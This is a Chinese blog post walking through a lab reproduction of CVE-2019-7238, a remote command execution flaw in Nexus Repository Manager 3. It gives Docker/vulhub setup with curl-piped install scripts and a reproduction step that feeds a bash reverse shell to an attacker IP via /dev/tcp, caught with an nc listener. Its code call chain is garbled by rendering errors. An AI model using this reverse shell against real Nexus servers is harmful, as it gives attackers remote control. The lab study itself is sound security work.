Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)

最新推荐文章于 2024-05-25 23:08:08 发布

淡淡的就好_

最新推荐文章于 2024-05-25 23:08:08 发布

阅读量3.0k

点赞数

分类专栏：渗透测试文章标签： cve-2019-7238 nexus Repository Manager 3

本文链接：https://blog.csdn.net/qq_36369941/article/details/96331288

版权

渗透测试专栏收录该内容

3 篇文章 1 订阅

订阅专栏

简介

Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。

影响范围

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

漏洞成因

###由于未授权访问的用户可以构造请求而造成任意代码执，触发流程如下：

ExtDirectModule $KaTeX parse error: Expected 'EOF', got '#' at position 14: configure:60 #̲ 路由绑定与请求解析 ExtD\dots$ doPost:155 # 处理post请求
DirectJNgineServlet $KaTeX parse error: Expected 'EOF', got '#' at position 12: doPost:595 #̲ 根据不同的Content-T\dots$ processRequest:632 # 解析json请求
JsonRequestProcesor $KaTeX parse error: Expected 'EOF', got '#' at position 13: process:119 #̲ 解析json语法树 Json\dots$ getIndividualJsonRequests:216 # 提取json数据
JsonRequestProcesor $KaTeX parse error: Expected 'EOF', got '#' at position 13: process:133 #̲ 构造返回结构 Compone\dots$ previewAssets:188 # 解析post包中的data数据并构造查询语句查询包
ComponentComponent $KaTeX parse error: Expected 'EOF', got '#' at position 19: \dotsviewAssets:208 #̲ 获得查询结果 BrowseS\dots$ previewAssets:252 # 构建OrientDb查询语句
BrowseServiceImpl $KaTeX parse error: Expected 'EOF', got '#' at position 19: \dotsviewAssets:258 #̲ 拼接查询语句 BrowseS\dots$ previewAssets:262 # 执行查询
MetadataNodeEntityAdapter $KaTeX parse error: Expected 'EOF', got '#' at position 18: \dotsuntByQuery:221 #̲ 执行OrientDb查询语句\dots$ execute:125 # 提取jexl表达式
ContextExpressionFunction$checkJexlExpression:15

修复方法

目前官方已经发布新版本修改了该漏洞，建议您参照上述【安全版本】升级到对应的最新版本。

环境搭建

1.在centos 7 上安装docker和docker-compose

(1).安装PIP
curl -s https://bootstrap.pypa.io/get-pip.py | python3
(2).安装docker
curl -s https://get.docker.com/ | sh
(3).启动docker服务
service docker start

在这里插入图片描述

(4).安装docker compose
pip install docker-compose

2.使用方法

(1).下载漏洞环境项目
git clone https://github.com/vulhub/vulhub.git
(2).进入到nexus利用环境
cd vulhub/nexus/CVE-2019-7238
(3).编译环境
docker-compose build

在这里插入图片描述

(4).执行如下命令启动Nexus Repository Manager 3.14.0
docker-compose build

漏洞复现

1.进入到CVE-2019-7238目录
cd CVE-2019-7238
2.修改cve-2019-7238.py.这里根据实际情况来修改remote = ‘ http://192.168.1.144:8081 （存在漏洞的主机ip地址）‘和 ARCH = “ LINUX ”的值，浏览器中访问http://192.168.1.144:8081,如下图所示：
在这里插入图片描述

3.在攻击者系统中执行cve-2019-7238.py脚本，然后输入反弹NC的bash（此处的IP地址是攻击者的ip地址，即192.168.1.165，端口任意）
bash -i >& /dev/tcp/192.168.1.165/2333 0>&1
在这里插入图片描述
4.在攻击者系统中执行NC监听反弹（在攻击机上执行反弹shell，即在192.168.1.165机器上）
nc -lvvp 2333

#参考链接：

淡淡的就好_

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)

简介Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。影响范围Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
复制链接

扫一扫